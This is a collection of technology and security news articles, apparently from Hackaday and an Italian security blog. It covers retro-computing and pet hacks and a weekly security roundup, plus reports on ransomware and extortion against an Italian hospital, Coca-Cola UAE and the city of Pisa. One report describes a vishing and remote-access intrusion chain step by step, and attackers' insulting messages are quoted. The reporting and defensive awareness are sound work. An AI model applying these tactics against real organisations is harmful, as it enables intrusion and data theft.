When retro computing nostalgia meets modern wireless wizardry, you get a near-magical tap-to-load experience. It’ll turn your Commodore 64 into a console-like system, complete with physical game cards. Inspired by TapTo for MiSTer, this latest hack brings NFC magic to real hardware using the TeensyROM. It’s been out there for a while, but it might not have caught your attention as of yet. Developed by [Sensorium] and showcased by YouTuber [StatMat], this project is a tactile, techie love letter to the past.

At the heart of it is the TeensyROM cartridge, which – thanks to some clever firmware modding – now supports reading NFC tags. These are writable NTag215 cards storing the path to game files on the Teensy’s SD card. Tap a tag to the NFC reader, and the TeensyROM boots your game. No need to fumble with LOAD “*”,8,1. That’s not only cool, it’s convenient – especially for retro demo setups.

What truly sets this apart is the reintroduction of physical tokens. Each game lives on its own custom-designed card, styled after PC Engine HuCards or printed with holographic vinyl. It’s a tangible, collectible gimmick that echoes the golden days of floppies and cartridges – but with 2020s tech underneath. Watch it here.

youtube.com/embed/FqgyiQdGp7o?…

hackaday.com/2025/05/23/teensy…

Typically, when we think about forming metal parts, we think about beating them with hammers, or squeezing them with big hydraulic presses. But what if magnets could do the squeezing? As it turns out—Grumman Aerospace discovered they can, several decades ago! Even better, they summed up this technique in a great educational video which we’ve placed below the break.

The video concerns the development of the Grumman EMF Torque Tube. The parts are essentially tubes with gear-like fittings mounted in either end, which are fixed with electromagnetic forming techniques instead of riveting or crimping. Right away, we’re told the key benefits—torque tubes built this way are “stronger, lighter, and more fatigue resistant” than those built with conventional techniques. Grumman used these torque tubes in such famous aircraft as the F-14 Tomcat, highlighting their performance and reliability.

Before……and after. The part is formed and the coil is destroyed.
The video goes on to explain the basics of the EMF torque tube production process. A tube is placed inside a coil, with the end fitting then installed inside. A capacitor bank dumps current through the coil to generate a strong electromagnetic field. This field is opposed by a secondary field generated by eddy currents. The two forces result in an explosive force which drives the tube inwards, gripping into the grooves of the end fitting, and destroys the coil in the process. Grumman notes that it specifically optimized a grooving profile for bonding tubes with end fittings, which maximised the strength of these EMF-produced joints.

This tip was sent in by [irox]. The video itself was posted by [Greg Benoit], who notes his father Robert Benoit was intimately involved with the development of the technique. Indeed, it was useful enough that the technology was licensed to Boeing, generating many millions of dollars for Grumman.

We feature all kinds of machining and forming techniques here, but this sort of forming isn’t something we see a lot of around these parts. Still, we’re sure someone will be Kickstarting a home EMF forming machine before the end of next week.

youtube.com/embed/QHxtY6_zxZo?…

hackaday.com/2025/05/23/emf-fo…

This project submitted to the 2025 Pet Hacks Contest brings a bit of IoT to your finned friends. Aquassist is a fish feeder that is primarily 3D printed only requiring a servo and a microcontroller to give you remote control of feeding your fish.

The Aquassist consists of just six 3D-printed parts. At its core is an Archimedes screw, a mechanism that ensures consistent portions of fish food are dispensed into the fish tank. A small hopper on top holds the food, and to minimize the part count, all 3D-printed components are designed to be glued together.

The brains of the operation take place in a Wemos D1 mini, a compact ESP8266 board programed using the Arduino IDE. The feeding mechanism relies on an SG90 continuous rotation servo, which rotates the Archimedes screw to dispense food. Unlike standard servos, this model offers ample torque in a small package and can rotate continuously without hitting an angular limit.

The Aquassist is controlled via a web-based application accessible from any device. The D1 Mini connects to Firebase to check the feeding schedule or detect if the “Feed Now” button has been pressed. Users can set feeding times or trigger an immediate feeding through the app’s intuitive interface. Check out a video below to see the Aquassist in action, and check our our other entries into the 2025 Pet Hacks Contest.

youtube.com/embed/i-F6hm34lFM?…

hackaday.com/2025/05/23/2025-p…

[Dmytro] was able to lay his hands on a InfiRay T2S+ camera. It’s a capable thermal imaging unit that comes at a cheaper price than many of its rivals. [Dmytro] decided to pull it apart to see what makes it tick, and he discovered a few interesting things along the way.

Like so much modern hardware, pulling the case apart does require some spudging and levering. Once inside, though, it comes apart in a relatively straightforward manner. Once inside, [Dmytro] notes some similarities between this camera and the Flir Lepton, another affordable thermal camera on the market. He also finds a clone of the Cypress FX2LP chip, which is used for talking USB. There’s also an Gowin FPGA inside, with [Dmytro] suspecting the gateware onboard could be modified. If so, the camera may be a candidate for running open source firmware in future.

What bothered [Dmytro] about this camera, though, was the software. When used with an Android phone, the camera demands the use of a proprietary app with with questionable permissions. It can be used on a regular computer, where it appears as a standard webcam. However, in this mode, the camera fails to self-calibrate, and the images quickly become useless. [Dmytro] worked to hack around this, by figuring out a way to trigger calibrations and run the proper image corrections manually when using the camera without the smartphone app. He also explores techniques to improve the resolution of the thermal measurements made by the camera.

We’ve seen some other neat thermal camera hacks over the years. Video after the break.

youtube.com/embed/bePf-qhZ_Vg?…

[Thanks to Clint for the tip!]

hackaday.com/2025/05/23/tearin…

It’s been a universal trait among the different faithful Hackaday Hounds who have loped around these parts over the decades, that there is no place warm enough for their tastes. Fire up the stove and the dog is there stretched out in front of it, leaving one to wonder whether our house temperature is being cruel to the mutt, or simply that they are heat sponges with infinite capacity. There’s got to be some joy in doggy circles then at the prospect of [John.r.sheahan]’s heated dog bed, designed in particular with the comfort of an older dog in mind.

In electronics terms it’s a relatively low-tech project, using as it does a 12 volt electric lap blanket aimed at motorists. It’s none the less a hack though, because it has a frame made of PVC pipe to hold it, and a blanked clipped in place. This forms a box-like structure above the sleeping position keeping the dog very comfortable indeed over chilly nights. We’ve cared for more than one geriatric dog over the years, and can see that something like this is vital for their comfort and well-being.

This project is part of the 2025 Pet Hacks contest, so look out for more like it. Alternatively if your faithful friend uses something you made, why not enter yourself!

hackaday.com/2025/05/23/2025-p…

We’re back in Europe for this week’s Hackaday podcast, as Elliot Williams is joined by Jenny List. In the news this week is the passing of Ed Smylie, the engineer who devised the famous improvised carbon dioxide filter that saved the Apollo 13 astronauts with duct tape.

Closer to home is the announcement of the call for participation for this year’s Hackaday Supercon; we know you will have some ideas and projects you’d like to share.

Interesting hacks this week include a new Mac Plus motherboard and Doom (just) running on an Atari ST, while a LoRa secure messenger and an astounding open-source Ethernet switch captivated us on the hardware front. We also take a dive into the Mouse programming language, a minimalist stack-based environment from the 1970s. Among the quick hacks are a semiconductor dopant you can safely make at home, and a beautiful Mac Mini based cyberdeck.

Finally, we wrap up with our colleague [Maya Posch] making the case for a graceful degradation of web standards, something which is now sadly missing from so much of the online world, and then with the discovery that ChatGPT can make a passable show of emulating a Hackaday scribe. Don’t worry folks, we’re still reassuringly meat-based.

html5-player.libsyn.com/embed/…

Insesrt MP3 podcast link here.

Episode 322 Show Notes:

News:

• Hackaday Supercon 2025 Call For Participation: We Want You!
• In Memory Of Ed Smylie, Whose Famous Hack Saved The Apollo 13 Crew

What’s That Sound:

• Congrats to [calculus] for picking up the [Jerobeam Fenderson] mushrooms.
• A Wrencher on Your Oscilloscope

Interesting Hacks of the Week:

• Escaping US Tech Giants Leads European YouTuber To Open Source
• A New Mac Plus Motherboard, No Special Chips Required
  
  • The Lost 256 KB Japanese ROM For The Macintosh Plus Has Been Found

  
  

• As The World Burns, At Least You’ll Have Secure Messaging
• Working On Open-Source High-Speed Ethernet Switch
• The Mouse Language, Running On Arduino
  
  • MUSYS. Peter Grogono, United Kingdom, 1969 – 120 Years of Electronic Music

  
  

• Running DOOM On An Atari ST

Quick Hacks:

• Elliot’s Picks:
  
  • PentaPico: A Pi Pico Cluster For Image Convolution
  • Designing A Hobbyist’s Semiconductor Dopant
  • LACED: Peeling Back PCB Layers With Chemical Etching And A Laser
  • MCP Blender Addon Lets AI Take The Wheel And Wield The Tools

  
  

• Jenny’s Picks:
  
  • An Awful 1990s PDA Delivers AI Wisdom
  • Speed Up Arduino With Clever Coding
  • Stylus Synth Should Have Used A 555– And Did!
  • A Portable M4 Mac Mini

  
  

Can’t-Miss Articles:

• The World Wide Web And The Death Of Graceful Degradation
• ChatGPT & Me. ChatGPT Is Me!

hackaday.com/2025/05/23/hackad…

The Flipper Zero can do all kinds of neat stuff, like helping you cut keys or decode various radio transmissions. However, until now, it hasn’t been particularly adept at persistence of vision tasks. For that very purpose, [Derek] built the LightMessenger.
The device doing its job.
The LightMessenger is a hardware add-on module for the Flipper Zero. In persistence-of-vision mode, you can plug it in via the GPIO header and display messages in the air by shaking it around. Even better, you can do so in color, with a height resolution of 16 pixels—meaning you can display some nice text or basic graphics. You can key in different text or select and edit bitmaps using the utility on the Flipper screen itself.

[Derek] also included a flashlight mode for the simple utility of it all. In Part 2 of [Derek’s] write-up, he also goes into detail on the development and manufacturing process for the device.

Files are on GitHub for the curious. We’ve gone over the basics of POV projects before, too.

youtube.com/embed/NlNuNxXg9r0?…

hackaday.com/2025/05/23/pov-on…

“Ciao Italia! L’attacco all’ospedale italiano è riuscito. Ci siamo stabiliti nel sistema, caricando un exploit sul server, ottenendo molte informazioni utili dalle schede dei pazienti. Nell’immagine potete vedere i medici mentre operano i loro pazienti. 😄 I giornalisti ci accuseranno di nuovo di cyberterrorismo?”

Questo è il messaggio, cinico e inquietante, pubblicato dagli hacktivisti del gruppo SECTOR16 dopo aver violato i sistemi di un ospedale italiano. Hanno preso il controllo dell’impianto di videosorveglianza. Hanno registrato e poi diffuso pubblicamente le immagini delle sale operatorie. Hanno sottratto dati sensibili dei pazienti. Hanno dimostrato – ancora una volta – quanto i nostri presidi sanitari siano esposti, vulnerabili, indifesi.

Ma se l’attacco fosse stato distruttivo?

Questa non è una simulazione. Non è un test. È un fatto gravissimo!

Se l’attacco fosse stato distruttivo – come spesso accade con i ransomware – i sistemi dell’ospedale avrebbero potuto andare in blocco totale: reparti paralizzati, documentazione clinica inaccessibile, operazioni sospese, soccorsi ritardati. Quando si parla di ospedali, ogni secondo può fare la differenza tra la vita e la morte.

E invece, oggi, lasciamo che i cybercriminali si introducano nei nostri ospedali con la stessa facilità con cui entrano in un sito mal protetto.

Sono Cybercriminali? Si. Ma noi siamo degli incapaci a gestire la cyber-sicurezza delle infrastrutture critiche.

Perché mancano risorse, competenze, operatività e attenzione. Perché non c’è ancora una cultura della sicurezza digitale nel settore sanitario. E questo è inaccettabile. I dati sanitari sono il nuovo oro del dark web: completi, dettagliati, altamente sensibili. Ma non è solo la privacy a essere a rischio. Sono i pazienti. Sono i medici. È la sanità pubblica nel suo complesso.

Dobbiamo agire. Subito

Occorrono investimenti reali in sicurezza informatica per gli ospedali. Occorre formare il personale. Occorre dotarsi di sistemi di difesa adeguati. Perché proteggere le strutture sanitarie oggi non significa solo evitare una violazione: significa salvare vite umane.

E mentre gruppi come SECTOR16 ironizzano sulle immagini rubate da una sala operatoria, noi dovremmo smettere di minimizzare. Dovremmo smettere di far finta che “tanto queste cose succedono solo altrove”.

Succedono qui! E quando sarai tu ad andare all’ospedale e non potranno darti le cure dovute perché drasticamente sottodimensionati a causa di un attacco informatico, ti ricorderai di questo articolo.

È il momento di trattare la cybersicurezza come una questione di salute pubblica. Perché lo è.

E volete saperne una? Ecco la lista degli attacchi noti agli ospedali italiani. Perché noi di Red Hot Cyber non dimentichiamo.

Gli attacchi noti agli ospedali italiani

Molto tempo fa riportammo che gli ospedali sarebbero divenuti “le galline dalle uova d’oro” per il cybercrime, in quanto il rischio non è solo inerente la perdita dei dati, ma anche la vita delle persone. I criminali lo sanno bene che la velocità di azione di un ospedale risulta essenziale, ma sappiamo anche che gli ospedali hanno un” postura cyber” da rivedere in modo profondo.

Purtroppo sono molte le organizzazioni ospedaliere colpite dagli incidenti di sicurezza e soprattutto il ransomware risulta il vettore di attacco principalmente utilizzato. La Lista delle organizzazioni sanitare colpite, dove ne conosciamo le rivendicazioni della PA si allunga sempre di più giorno dopo giorno:

• L’ospedale San Giovanni Addolorata di Roma,
• ASL 3 di Roma
• ASL 2 di Savona
• ASL 2 di Terni
• ASP di Messina 2021
• ULSS6 di Padova
• ASL Napoli 3
• ASST Lecco
• ASP Messina 2022
• ATS Insubria
• Fatebenefratelli Sacco
• Ospedale Macedonio Melloni
• ASL5 di La Spezia
• Ospedale Universitario di Parma
• Ospedale Niguarda
• ASL1 Abruzzo
• Centro Ortopedico di Quadrante
• Azienda ospedaliera universitaria integrata di Verona
• Attacco alla Synlab
• ASST Rhodense

Purtroppo l’Italia sembra non aver ancora compreso l’importanza strategica a livello di sicurezza nazionale di queste infrastrutture. Tali infrastrutture vengono continuamente bersagliato dal cybercrime e che devono essere protette per garantire la salute delle persone.

L'articolo Un Ospedale Italiano è stato Violato! I Video dei Pazienti e delle Sale Operatorie Sono Online! proviene da il blog della sicurezza informatica.

il 22 maggio 2025, è emersa la notizia di un attacco ransomware ai danni della divisione Emirati Arabi della Coca-Cola Company, rivendicato dal gruppo Everest. La compromissione sarebbe avvenuta in seguito all’utilizzo di un infostealer, uno strumento sempre più diffuso nel panorama del cybercrime, capace di sottrarre in modo silenzioso credenziali aziendali e facilitare accessi non autorizzati.

L’attacco è stato reso noto attraverso il portale onion gestito dal gruppo Everest, dove sono state pubblicate prove dell’intrusione e annunciata l’intenzione di diffondere pubblicamente i dati sottratti entro pochi giorni. Parallelamente, parte del database esfiltrato sembrerebbe già in vendita nel dark web, come indicato da thread rilevanti su forum underground.

Attualmente, non sono ancora stati confermati i volumi precisi di dati esfiltrati, né l’impatto operativo sulle attività dell’azienda nella regione. Tuttavia, la pubblicazione dell’attacco sui canali criminali indica con ogni probabilità l’intenzione del gruppo di passare alla fase di estorsione o vendita dei dati, strategia già adottata in passato da Everest.

Disclaimer: Questo rapporto include screenshot e/o testo tratti da fonti pubblicamente accessibili. Le informazioni fornite hanno esclusivamente finalità di intelligence sulle minacce e di sensibilizzazione sui rischi di cybersecurity. Red Hot Cyber condanna qualsiasi accesso non autorizzato, diffusione impropria o utilizzo illecito di tali dati. Al momento, non è possibile verificare in modo indipendente l’autenticità delle informazioni riportate, poiché l’organizzazione coinvolta non ha ancora rilasciato un comunicato ufficiale sul proprio sito web. Di conseguenza, questo articolo deve essere considerato esclusivamente a scopo informativo e di intelligence.

I dati sottratti

Secondo quanto pubblicato da Everest sul proprio portale Tor, i dati compromessi includono informazioni sensibili relative a circa 959 dipendenti, tra cui:

• Documenti d’identità
• Profili Salesforce
• Anagrafiche complete
• Informazioni interne e riservate

Screenshot mostrano dati personali, documenti ufficiali e profili utente interni, segnalando un potenziale impatto severo sulla privacy dei dipendenti e sulla sicurezza operativa dell’organizzazione.

Inoltre, un’altra parte dei dati appare in vendita su forum underground, come evidenziato nell’immagine sottostante, a conferma dell’avvenuta esfiltrazione e del tentativo di monetizzazione da parte degli attori coinvolti.

Come prassi del gruppo Everest, è stato attivato un timer visibile sul portale dark web associato all’attacco. Questo countdown rappresenta la scadenza entro la quale l’organizzazione vittima è chiamata a negoziare o pagare un riscatto. Al termine del tempo stabilito, i dati verranno presumibilmente resi pubblici o venduti definitivamente a terzi.

Questo meccanismo di pressione è parte integrante della tattica di triple extortion, che combina cifratura, minaccia reputazionale e in alcuni casi persino il contatto diretto con clienti o partner dell’azienda colpita.

Chi è Everest? Un attore tra ransomware e estorsione

Everest è un gruppo ransomware-as-a-service (RaaS) attivo dal 2020, noto per attacchi mirati a grandi imprese e infrastrutture critiche. Il loro modus operandi si basa spesso sulla collaborazione con access broker, criminali che forniscono credenziali aziendali compromesse ottenute tramite infostealer, phishing o vulnerabilità note.

Una volta all’interno della rete, Everest esegue movimenti laterali, esfiltra dati sensibili e infine avvia la cifratura dei sistemi. Le vittime vengono poi ricattate con la minaccia di divulgare pubblicamente i dati rubati – una strategia nota come double extortion.

Conclusioni

Il caso Coca-Cola Emirati Arabi rappresenta un esempio concreto della catena d’attacco moderna: dall’infezione con infostealer all’infiltrazione della rete aziendale, fino all’attacco ransomware e alla vendita dei dati nel dark web.

RHC continuerà a monitorare la situazione e pubblicherà eventuali ulteriori aggiornamenti qualora emergessero informazioni significative.
Invitiamo chiunque sia a conoscenza di dettagli rilevanti a contattarci attraverso la mail crittografata del whistleblower, garantendo la possibilità di rimanere anonimi.

L'articolo Coca-Cola Emirati Arabi sotto attacco: Everest Ransomware colpisce tramite infostealer proviene da il blog della sicurezza informatica.

Digital Rights Management (DRM) has been the bane of users since it was first introduced. Who remembers the battle it was getting Netflix running on Linux machines, or the literal legal fight over the DVD DRM decryption key? So the news from Signal, that DRM is finally being put to use to protect users is ironic.

The reason for this is Microsoft Recall — the AI powered feature that takes a snapshot of everything on the user’s desktop every few seconds. For whatever reason, you might want to exempt some windows from Recall’s memory window. It doesn’t speak well for Microsoft’s implementation that the easiest way for an application to opt out of the feature is to mark its window as containing DRM content. Signal, the private communications platform, is using this to hide from Recall and other screenshotting applications.

The Signal blogs warns that this may be just the start of agentic AI being rolled out with insufficient controls and permissions. The issue here isn’t the singularity or AI reaching sentience, it’s the same old security and privacy problems we’ve always had: Too much information being collected, data being shared without permission, and an untrusted actor having access to way more than it should.

Legacy Malware?

The last few stories we’ve covered about malicious code in open source repositories have featured how quickly the bad packages were caught. Then there’s this story about two-year-old malicious packages on NPM that are just now being found.

It may be that the reason these packages weren’t discovered until now, is that these packages aren’t looking to exfiltrate data, or steal bitcoin, or load other malware. Instead, these packages have a trigger date, and just sabotage the systems they’re installed on — sometimes in rather subtle ways. If a web application you were writing was experiencing intermittent failures, how long would it take you to suspect malware in one of your JavaScript libraries?

Where Are You Calling From?

Phone phreaking isn’t dead, it has just gone digital. One of the possibly apocryphal origins of phone phreaking was a toy bo’sun whistle in boxes of cereal, that just happened to play a 2600 Hz tone. More serious phreakers used more sophisticated, digital versions of the whistle, calling them blue boxes. In modern times, apparently, the equivalent of the blue box is a rooted Android phone. [Daniel Williams] has the story of playing with Voice over LTE (VoLTE) cell phone calls. A bug in the app he was using forced him to look at the raw network messages coming from O2 UK, his local carrier.

And those messages were weird. VoLTE is essentially using the Session Initiation Protocol (SIP) to handle cell phone calls as Voice over IP (VoIP) calls using the cellular data network. SIP is used in telephony all over the place, from desk phones to video conferencing solutions. SIP calls have headers that work to route the call, which can contain all sorts of metadata about the call. [Daniel] took a look at the SIP headers on a VoLTE call, and noticed some strange things. For one, the International Mobile Subscriber Identity (IMSI) and International Mobile Equipment Identity (IMEI) codes for both the sender and destination were available.

He also stumbled onto an interesting header, the Cellular-Network-Info header. This header encodes way too much data about the network the remote caller is connected to, including the exact tower being used. In an urban environment, that locates a cell phone to an area not much bigger than a city block. Together with leaking the IMSI and IMEI, this is a dangerous amount of information to leak to anyone on the network. [Daniel] attempted to report the issue to O2 in late March, and was met with complete silence. However, a mere two days after this write-up was published, on May 19th, O2 finally made contact, and confirmed that the issue had finally been resolved.

ARP Spoofing in Practice

TCP has an inherent security advantage, because it’s a stateful connection, it’s much harder to make a connection from a spoofed IP address. It’s harder, but it’s not impossible. One of the approaches that allows actual TCP connections from spoofed IPs is Address Resolution Protocol (ARP) poisoning. Ethernet switches don’t look at IP addresses, but instead route using MAC addresses. ARP is the protocol that distributes the MAC Address to IP mapping on the local network.

And like many protocols from early in the Internet’s history, ARP requests don’t include any cryptography and aren’t validated. Generally, whoever claims an IP address first wins, so the key is automating this process. And hence, enter NetImposter, a new tool specifically designed to automate this process, sending spoofed ARP packets, and establishing an “impossible” TCP connection.

Impossible RCE in SSH

Over two years ago, researchers at Qualsys discovered a pre-authentication double-free in OpenSSH server version 9.1. 9.2 was quickly released, and because none of the very major distributions had shipped 9.1 yet, what could have been a very nasty problem was patched pretty quietly. Because of the now-standard hardening features in modern Linux and BSD distributions, this vulnerability was thought to be impossible to actually leverage into Remote Code Execution (RCE).

If someone get a working OpenSSH exploit from this bug, I'm switching my main desktop to Windows 98 (this bug was discovered by a Windows 98 user who noticed sshd was crashing when trying to login to a Linux server!)

— Tavis Ormandy (@taviso) February 14, 2023

The bug was famously discovered by attempting to SSH into a modern Linux machine from a Windows 98 machine, and Tavis Ormandy claimed he would switch to Windows 98 on his main machine if someone did actually manage to exploit it for RCE. [Perri Adams] thought this was a hilarious challenge, and started working an exploit. Now we have good and bad news about this effort. [Perri] is pretty sure it is actually possible, to groom the heap and with enough attempts, overwrite an interesting pointer, and leak enough information in the process to overcome address randomization, and get RCE. The bad news is that the reward of dooming [Tavis] to a Windows 98 machine for a while wasn’t quite enough to be worth the pain of turning the work into a fully functional exploit.

But that’s where [Perri’s] OffensiveCon keynote took an AI turn. How well would any of the cutting-edge AIs do at finding, understanding, fixing, and exploiting this vulnerability? As you probably already guessed, the results were mixed. Two of the three AIs thought the function just didn’t have any memory management problems at all. Once informed of the problem, the models had more useful analysis of the code, but they still couldn’t produce any remotely useful code for exploitation. [Perri’s] takeaway is that AI systems are approaching the threshold of being useful for defensive programming work. Distilling what code is doing, helping in reverse engineering, and working as a smarter sort of spell checker are all wins for programmers and security researchers. But fortunately, we’re not anywhere close to a world where AI is developing and deploying exploitations.

youtube.com/embed/Y1naY3gupRw?…

Bits and Bytes

There are a pair of new versions of reverse engineering/forensic tools released very recently. Up first is Frida, a runtime debugger on steroids, that is celebrating its 17th major version release. One of the major features is migrating to pluggable runtime bridges, and moving away from strictly bundling them. We also have Volatility 3, a memory forensics framework. This isn’t the first Volatility 3 release, but it is the release where version three officially has parity with the version two of the framework.

The Foscam X5 security camera has a pair of buffer overflows, each of which can be leveraged to acieve arbitrary RCE. One of the proof-of-concepts has a very impressive use of a write-null-anywhere primitive to corrupt a return pointer, and jump into a ROP gadget. The concerning element of this disclosure is that the vendor has been completely unresponsive, and the vulnerabilities are still unaddressed.

And finally, one of the themes that I’ve repeatedly revisited is that airtight attribution is really difficult. [Andy Gill] walks us through just one of the many reasons that’s difficult. Git cryptographically signs the contents of a commit, but not the timestamps. This came up when looking through the timestamps from “Jia Tan” in the XZ compromise. Git timestamps can be trivially rewritten. Attestation is hard.

hackaday.com/2025/05/23/this-w…

Gli operatori del ransomware 3AM eseguono attacchi mirati contro i bersagli designati. Gli hacker bombardano i dipendenti delle aziende con e-mail e telefonate, fingendosi personale di supporto, per costringere gli utenti a fornire le credenziali per l’accesso remoto ai sistemi aziendali.

Gli esperti di Sophos scrivono che in passato tali tattiche erano utilizzate principalmente dagli autori del ransomware Black Basta e dal gruppo di hacker FIN7, ma ora l’efficacia di tali attacchi ha portato alla loro più ampia diffusione.

I ricercatori riferiscono che tra novembre 2024 e gennaio 2025 sono stati rilevati almeno 55 attacchi che hanno utilizzato tali tecniche e collegano l’attività a due diversi cluster di minacce.

Gli attacchi includono l’invio di più e-mail, vishing (phishing vocale) tramite Microsoft Teams e l’abuso di Quick Assist. A quanto pare, la fuga di notizie delle chat interne di Black Basta , avvenuta all’inizio del 2025, si è rivelata utile ad altri aggressori. Ora stanno utilizzando un modello per attacchi di phishing tramite Microsoft Teams, fingendosi dipendenti IT.

Uno degli attacchi ransomware 3AM a un cliente Sophos si è verificato nel primo trimestre del 2025, è durato nove giorni e gli hacker hanno utilizzato un approccio simile. Solo che invece di usare Microsoft Teams, hanno iniziato con il phishing telefonico.

Gli aggressori hanno sostituito il vero numero di telefono del reparto IT del cliente per rendere la chiamata più credibile. Gli hacker hanno telefonato inviando contemporaneamente numerose e-mail dannose: in soli tre minuti, la vittima ne ha ricevute 24.

In questo modo, l’aggressore ha convinto un dipendente dell’azienda presa di mira ad aprire Microsoft Quick Assist e a fornire l’accesso remoto, presumibilmente per proteggersi da attività dannose. L’hacker ha quindi scaricato e decompresso un archivio dannoso contenente uno script VBS, un emulatore QEMU e un’immagine di Windows 7 con la backdoor QDoor.

QEMU veniva utilizzato per eludere il rilevamento instradando il traffico di rete attraverso macchine virtuali create sulla piattaforma, consentendo agli hacker di ottenere un accesso persistente ma non rilevato alla rete della vittima. Infine, gli aggressori hanno eseguito una ricognizione sulla rete dell’azienda presa di mira utilizzando WMIC e PowerShell, hanno creato un account amministratore locale per la connessione tramite RDP, hanno installato lo strumento RMM commerciale XEOXRemote e hanno compromesso l’account amministratore di dominio.

L'articolo Vishing da incubo: 24 email in 3 minuti e una telefonata per hackerare un’intera azienda proviene da il blog della sicurezza informatica.

Dutch research institute [AMOLF] shows off a small robot capable of walking, hopping, and swimming without any separate control system. The limbs synchronize thanks to the physical interplay between the robot’s design and its environment. There are some great videos on that project page, so be sure to check it out.
A kinked soft tube oscillates when supplied with continuous air.
Powered by a continuous stream of air blown into soft, kinked tubular limbs, the legs oscillate much like the eye-catching “tube man” many of us have seen by roadsides. At first it’s chaotic, but the movements rapidly synchronize into a meaningful rhythm that self-synchronizes and adapts. On land, the robot does a sort of hopping gait. In water, it becomes a paddling motion. The result in both cases is a fast little robot that does it all without any actual control system, relying on physics.

You can watch it in action in the video, embedded below. The full article “Physical synchronization of soft self-oscillating limbs for fast and autonomous locomotion” is also available.

Gait control is typically a nontrivial problem in robotics, but it doesn’t necessarily require a separate control system. Things like BEAM robotics and even the humble bristlebot demonstrate the ability for relatively complex behavior and locomotion to result from nothing more than the careful arrangement of otherwise simple elements.

youtube.com/embed/oyKnCRqNj84?…

hackaday.com/2025/05/23/behold…

I black hacker di NOVA tornano a colpire, e questa volta con insulti all’Italia dopo la pubblicazione dei dati del presunto attacco informatico al Comune di Pisa. Dopo aver rivendicato l’attacco il 10 maggio 2025, il gruppo criminale ha pubblicato i primi dati rubati, esattamente 11 giorni dopo l’annuncio sul loro forum underground.

Disclaimer: Questo rapporto include screenshot e/o testo tratti da fonti pubblicamente accessibili. Le informazioni fornite hanno esclusivamente finalità di intelligence sulle minacce e di sensibilizzazione sui rischi di cybersecurity. Red Hot Cyber condanna qualsiasi accesso non autorizzato, diffusione impropria o utilizzo illecito di tali dati. Al momento, non è possibile verificare in modo indipendente l’autenticità delle informazioni riportate, poiché l’organizzazione coinvolta non ha ancora rilasciato un comunicato ufficiale sul proprio sito web. Di conseguenza, questo articolo deve essere considerato esclusivamente a scopo informativo e di intelligence.
Immagine dall’home page del sito underground di Nova nella rete onion
Secondo quanto emerso dal sito underground di NOVA, la gang ha reso disponibile un archivio di 100 GB, diviso in diversi file compressi dal titolo “Municipality of Pisa”.

Il contenuto sarebbe stato crittografato il 10 maggio, lo stesso giorno della rivendicazione iniziale.
Immagine del post pubblicato da Nova all’interno del proprio sito

Nessun pagamento, pubblicazione dei dati

Nel messaggio pubblicato dalla gang, si leggono pesanti insulti contro le autorità italiane, accusate di non aver voluto trattare o pagare il “bug bounty” di 2 milioni di dollari richiesto come riscatto. Il tono del messaggio è aggressivo e sessista, con frasi denigratorie e minacce di una “Parte 2”, che lascia presagire ulteriori pubblicazioni.
Italia, vergognati

Paese mafioso, ora è il paese dei pagliacci, non hanno alcuna intenzione di pagare solo un po' (2 milioni di dollari) come taglia, ma cosa ne pensate di un paese sotto il controllo delle donne, [*** omettiamo la traduzione per una questione di rispetto ****] , nessuno ci ha mandato un messaggio per iniziare il riscatto, abbiamo mandato messaggi alla gmail di PISA ma nah, POVERO PAESE FOTTITI, LA PARTE 2 ARRIVERÀ, questo era solo l'inizio, andate a chiedere aiuto all'ACN, divertitevi con i dati
La comunicazione evidenzia anche un fallito tentativo di contatto da parte del gruppo, che afferma di aver cercato di inviare messaggi via Gmail al Comune di Pisa senza ricevere risposta.

ACN allertata, attacco confermato

Ora, con la pubblicazione effettiva dei dati, l’evento si potrebbe configurare come una data breach, con potenziali ripercussioni sulla privacy dei cittadini e sull’infrastruttura digitale dell’amministrazione, anche se il tutto risulta ancora da verificare.

Non è ancora chiaro il contenuto specifico degli archivi “d1.7z” e “U.7z”, ma data la dimensione e il target istituzionale, si teme la presenza di dati personali, email, contratti, documenti amministrativi e altre informazioni sensibili.

Conclusioni

L’attacco al Comune di Pisa rappresenta l’ennesimo caso in cui i criminali informatici non si limitano a criptare dati, ma cercano di umiliare pubblicamente le istituzioni, usando un linguaggio volgare, misogino e intimidatorio. Questa tattica serve ad aumentare la pressione psicologica e spingere verso il pagamento del riscatto? Probabilmente no, ma rappresenta un punto di svolta che abbiamo già visto in precedenza con il tema degli “scimpanzè” dell’informatica.

Nonostante ciò, la linea corretta da seguire rimane sempre quella di non pagare i riscatti: cedere al ricatto alimenta un circolo vizioso che finanzia ulteriormente il cybercrime, rafforzando gruppi come NOVA.

Tuttavia, è altrettanto fondamentale investire con decisione nella cybersecurity, sia a livello locale che nazionale. Il caso Pisa dimostra che non c’è più tempo di rimandare, ma è urgente rendere il nostro paese più resiliente, reattivo e preparato ad affrontare minacce sempre più sofisticate e spietate.

E questo è un tema “operativo” e non più un tema “politico”.

Come nostra consuetudine, lasciamo sempre spazio ad una dichiarazione dell’organizzazione qualora voglia darci degli aggiornamenti su questa vicenda e saremo lieti di pubblicarla con uno specifico articolo dando risalto alla questione.

RHC monitorerà l’evoluzione della vicenda in modo da pubblicare ulteriori news sul blog, qualora ci fossero novità sostanziali. Qualora ci siano persone informate sui fatti che volessero fornire informazioni in modo anonimo possono accedere utilizzare la mail crittografata del whistleblower.

L'articolo “Italia, Vergognati! Paese Mafioso!”. Insulti di Nova all’Italia dopo l’Attacco al Comune di Pisa proviene da il blog della sicurezza informatica.

It might be too soon to consider the innards of the old CRT monitor at the back of your closet to be something worth putting on display in your home or workshop. For that curio cabinet-worthy appeal, you need to look a bit further back. Say, about 150 years. Yes, that’ll do. A Crookes tube, the original electron beam-forming vacuum tube of glass, invented by Sir William Crookes et al. in the late 19th century, is what you need.

And a Crookes tube is what [Markus Bindhammer] found on AliExpress one day. He felt that piece of historic lab equipment was asking to be put on display in proper fashion. So he set to work crafting a wooden stand for it out of a repurposed candlestick, a nice piece of scrap oak, and some brass feet giving it that antique mad-scientist feel.

After connecting a high voltage generator and switch, the Crookes tube should have been all set, but nothing happened when it was powered up. It turned out that a capacitance issue was preventing the tube from springing to life. Wrapping the cathode end of the tube in aluminum foil, [Markus] formed what is effectively a Leyden jar, and that was the trick that kicked things into action.

As of this writing, there are no longer any Crookes tubes that we could find on AliExpress, so you’ll have to look elsewhere if you’re interested in showing off your own 19th century electron-streaming experiment. Check out the Crookes Radiometer for some more of Sir Williams Crookes’s science inside blown glass.

youtube.com/embed/rd7Y9ZRhcLs?…

hackaday.com/2025/05/23/foil-l…

